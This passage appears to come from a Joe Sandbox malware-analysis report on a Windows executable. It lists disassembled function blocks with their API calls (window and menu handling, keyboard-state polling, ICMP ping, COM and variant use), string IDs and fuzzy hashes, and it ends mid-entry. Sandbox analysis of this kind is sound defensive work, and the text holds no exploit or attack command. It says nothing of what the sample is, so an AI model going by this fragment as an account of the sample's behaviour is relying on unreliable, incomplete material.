                                                                    • Opcode Fuzzy Hash: 426f97a7d1b518d44519360239b437dfda0ae7e6a171f97f39ba97df6936c768
                                                                    • Instruction Fuzzy Hash: 56519C352183019BC300EF14CD92AAFB7EAFF84740F48485EF5D5AB2A2DB759909CA52
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __i64tow__itow__swprintf
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 421087845-2263619337
                                                                    • Opcode ID: 0b46355cd21638cffd674bf603ce6806011aade6fcfea83b45930d5bdcd3bf00
                                                                    • Instruction ID: 6cc1b7422c8d38d06c675051e1fcd8c9dbb18da2bf4d3ae414687b5082378cf2
                                                                    • Opcode Fuzzy Hash: 0b46355cd21638cffd674bf603ce6806011aade6fcfea83b45930d5bdcd3bf00
                                                                    • Instruction Fuzzy Hash: 4B41297150420A9FEB25DF78DC42E7A77E9EF05700F2444AFE689CB392EA769901B710
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0105716A
                                                                    • CreateMenu.USER32 ref: 01057185
                                                                    • SetMenu.USER32(?,00000000), ref: 01057194
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01057221
                                                                    • IsMenu.USER32(?), ref: 01057237
                                                                    • CreatePopupMenu.USER32 ref: 01057241
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0105726E
                                                                    • DrawMenuBar.USER32 ref: 01057276
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0$F
                                                                    • API String ID: 176399719-3044882817
                                                                    • Opcode ID: e061f2ecdf6838ac3ed90e1f5eab84f0d861ee0b2ef59c2901c7ad271e37bc34
                                                                    • Instruction ID: 76a394c2a260d7a13ae01b9f43292ea24f4f66ffd94359b021874a8b77c11846
                                                                    • Opcode Fuzzy Hash: e061f2ecdf6838ac3ed90e1f5eab84f0d861ee0b2ef59c2901c7ad271e37bc34
                                                                    • Instruction Fuzzy Hash: DA414574A01209AFDB61DF68D884E9ABBF5FF08350F144069FE85A7351D736A910DB90
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0105755E
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 01057565
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01057578
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 01057580
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0105758B
                                                                    • DeleteDC.GDI32(00000000), ref: 01057594
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0105759E
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010575B2
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010575BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 3f90998b8ebb5936406213ddc7976195d59e591fd07e4881cb409ffb08d87716
                                                                    • Instruction ID: ee28f2efc9fbf0bbea967d4dc6b39402e49a043815530130ca62777c450ad628
                                                                    • Opcode Fuzzy Hash: 3f90998b8ebb5936406213ddc7976195d59e591fd07e4881cb409ffb08d87716
                                                                    • Instruction Fuzzy Hash: E4315A72101216ABDF629F68DC08FDB3BA9FF09364F110215FA9596190CB7AD811DBA4
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00FF6E3E
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    • __gmtime64_s.LIBCMT ref: 00FF6ED7
                                                                    • __gmtime64_s.LIBCMT ref: 00FF6F0D
                                                                    • __gmtime64_s.LIBCMT ref: 00FF6F2A
                                                                    • __allrem.LIBCMT ref: 00FF6F80
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF6F9C
                                                                    • __allrem.LIBCMT ref: 00FF6FB3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF6FD1
                                                                    • __allrem.LIBCMT ref: 00FF6FE8
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF7006
                                                                    • __invoke_watson.LIBCMT ref: 00FF7077
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction ID: 66bae7601b4116fa0d7b1a8eb6a80517846498271fbce7dddb163498c1469da8
                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction Fuzzy Hash: 2E711876E0071BABE715AF68DC41BBAB7A8AF14734F14422AE614E72D0EF70DD409790
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032542
                                                                    • GetMenuItemInfoW.USER32(01095890,000000FF,00000000,00000030), ref: 010325A3
                                                                    • SetMenuItemInfoW.USER32(01095890,00000004,00000000,00000030), ref: 010325D9
                                                                    • Sleep.KERNEL32(000001F4), ref: 010325EB
                                                                    • GetMenuItemCount.USER32(?), ref: 0103262F
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0103264B
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 01032675
                                                                    • GetMenuItemID.USER32(?,?), ref: 010326BA
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01032700
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01032714
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01032735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: d353596a91f2ad49d585d00a095c5d093a7b03e6652c31b1a4a0259b94862edf
                                                                    • Instruction ID: abb67981537220ccea233c10ff1bd384a52c7388e78f7cb33a6a61911ff1c0d4
                                                                    • Opcode Fuzzy Hash: d353596a91f2ad49d585d00a095c5d093a7b03e6652c31b1a4a0259b94862edf
                                                                    • Instruction Fuzzy Hash: 8A61817490024AAFDB22DF68D988DBF7BBCFF85304F140499E9C2A7251D736A905DB21
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01056FA5
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01056FA8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 01056FCC
                                                                    • _memset.LIBCMT ref: 01056FDD
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01056FEF
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01057067
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 602ec4ccce10a371ddb8636cda9f83dff5f92b16a0947cff42ae3d7da46c4f96
                                                                    • Instruction ID: c0736cda12637e23ac1e64482e08798dc9ec1dd24855a43fed18894ac1352da3
                                                                    • Opcode Fuzzy Hash: 602ec4ccce10a371ddb8636cda9f83dff5f92b16a0947cff42ae3d7da46c4f96
                                                                    • Instruction Fuzzy Hash: DC618E75900208AFDB11DFA8CC80EEF77F9EF09710F50019AFA54AB291C775A941DBA0
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01026BBF
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 01026C18
                                                                    • VariantInit.OLEAUT32(?), ref: 01026C2A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 01026C4A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 01026C9D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 01026CB1
                                                                    • VariantClear.OLEAUT32(?), ref: 01026CC6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 01026CD3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01026CDC
                                                                    • VariantClear.OLEAUT32(?), ref: 01026CEE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01026CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: e06e683ddab3b3461b92e2b3ba8019b6d6dd09d4a68701556d19f482d37c68b0
                                                                    • Instruction ID: 1fb1d93079246cf2e21e666322980c226a287e396860f0089e8d2cf37520a684
                                                                    • Opcode Fuzzy Hash: e06e683ddab3b3461b92e2b3ba8019b6d6dd09d4a68701556d19f482d37c68b0
                                                                    • Instruction Fuzzy Hash: D8413175D0021E9FCF10EFA8D8449EEBFB9EF08354F108069E995A7251CB3AA945CF90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0102FD31
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 0102FDB2
                                                                    • GetKeyState.USER32(000000A0), ref: 0102FDCD
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 0102FDE7
                                                                    • GetKeyState.USER32(000000A1), ref: 0102FDFC
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 0102FE14
                                                                    • GetKeyState.USER32(00000011), ref: 0102FE26
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0102FE3E
                                                                    • GetKeyState.USER32(00000012), ref: 0102FE50
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 0102FE68
                                                                    • GetKeyState.USER32(0000005B), ref: 0102FE7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 9d031e0bafc1ad5d3c9e3c14dbbb2365eeac8fa3886f31eb727850b9ecc6baff
                                                                    • Instruction ID: 3b301d789f7501dfad777633abdc260569f8fb0af1264303efe75245dbbf0833
                                                                    • Opcode Fuzzy Hash: 9d031e0bafc1ad5d3c9e3c14dbbb2365eeac8fa3886f31eb727850b9ecc6baff
                                                                    • Instruction Fuzzy Hash: C741D6745047DB69FFB3AA6884043B6BEF16F01784F0840D9D6D6871C3EBE995C887A2
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • CoInitialize.OLE32 ref: 01048403
                                                                    • CoUninitialize.OLE32 ref: 0104840E
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,01062BEC,?), ref: 0104846E
                                                                    • IIDFromString.OLE32(?,?), ref: 010484E1
                                                                    • VariantInit.OLEAUT32(?), ref: 0104857B
                                                                    • VariantClear.OLEAUT32(?), ref: 010485DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 082c87d2e18a04e7e37ebe10cef5de5c668414f10d04c97c62e40e8a619ee658
                                                                    • Instruction ID: 611462534cd02ac8a709d807e74979c6e3f74b39b8b96a02506d4e3ff52da265
                                                                    • Opcode Fuzzy Hash: 082c87d2e18a04e7e37ebe10cef5de5c668414f10d04c97c62e40e8a619ee658
                                                                    • Instruction Fuzzy Hash: FF6191B06083129FD711DF94C888B6EBBE4AF85754F04886EF9C19B291CB74ED44CB92
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 01045793
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 010457D8
                                                                    • gethostbyname.WSOCK32(?), ref: 010457E4
                                                                    • IcmpCreateFile.IPHLPAPI ref: 010457F2
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01045862
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01045878
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 010458ED
                                                                    • WSACleanup.WSOCK32 ref: 010458F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: c98913a9d5755505d706e08127d2c00c1c72803a43d816948557b86137021198
                                                                    • Instruction ID: 544125c872351bd07cbfa5ce78f4a8aa0c47eccd8abbaf747c220b27f8f9408c
                                                                    • Opcode Fuzzy Hash: c98913a9d5755505d706e08127d2c00c1c72803a43d816948557b86137021198
                                                                    • Instruction Fuzzy Hash: FC516E716043019FEB21EF68DC85B2A7BE4EF49720F04456AF996EB291DB74E900DB42
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103B4D0
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0103B546
                                                                    • GetLastError.KERNEL32 ref: 0103B550
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0103B5BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 56b5cd28c616e1d3bc579222d024fb73d49ec2235eeade5d7d4c462e7c7dec67
                                                                    • Instruction ID: e7c64cd5fd1b297d376fc887f1f9cd862ecddfcda0148b41e146a4a622d0c0be
                                                                    • Opcode Fuzzy Hash: 56b5cd28c616e1d3bc579222d024fb73d49ec2235eeade5d7d4c462e7c7dec67
                                                                    • Instruction Fuzzy Hash: 9631C435A00205EFDB10EF68C885FAEBBB8FF85314F44815AE682DB2D1DB759A01CB41
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 01029014
                                                                    • GetDlgCtrlID.USER32 ref: 0102901F
                                                                    • GetParent.USER32 ref: 0102903B
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0102903E
                                                                    • GetDlgCtrlID.USER32(?), ref: 01029047
                                                                    • GetParent.USER32(?), ref: 01029063
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 01029066
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 977716ba1b5d4acd6a1ea54fc95cfdcc3f55a493fb736001296379723ebc1c8d
                                                                    • Instruction ID: 83d862c6acafcf2b7e50e9b03003548b17ed7d8a94998724de442db67bc7559e
                                                                    • Opcode Fuzzy Hash: 977716ba1b5d4acd6a1ea54fc95cfdcc3f55a493fb736001296379723ebc1c8d
                                                                    • Instruction Fuzzy Hash: 1A210370A00219BFDF10ABA4CC84EFEBBB5EF49310F00015AF9A1972A1DB3E5418DB20
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010290FD
                                                                    • GetDlgCtrlID.USER32 ref: 01029108
                                                                    • GetParent.USER32 ref: 01029124
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 01029127
                                                                    • GetDlgCtrlID.USER32(?), ref: 01029130
                                                                    • GetParent.USER32(?), ref: 0102914C
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0102914F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 79ebb097f371f1d1aabf7b63f4d955c0b7acef9d0143eceebfe83b15a94fc206
                                                                    • Instruction ID: 81079a0b8e0a87790135ae729015f38da67b15fb5b9f58a55d16c2a40cbbb655
                                                                    • Opcode Fuzzy Hash: 79ebb097f371f1d1aabf7b63f4d955c0b7acef9d0143eceebfe83b15a94fc206
                                                                    • Instruction Fuzzy Hash: 9321C574A00219BBDF11ABA5CC85EFEBBB5EF48300F10405AF991972A5DB7E9419DB20
                                                                    APIs
                                                                    • GetParent.USER32 ref: 0102916F
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 01029184
                                                                    • _wcscmp.LIBCMT ref: 01029196
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01029211
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: 37ac460dc6d41c8ad4a78e28ee8ebae1b3a6d56794bd463661746080a2d5e6dd
                                                                    • Instruction ID: d6be6afb31adff16393be1cb8745aeae8f02233d404d4531ef08182643489310
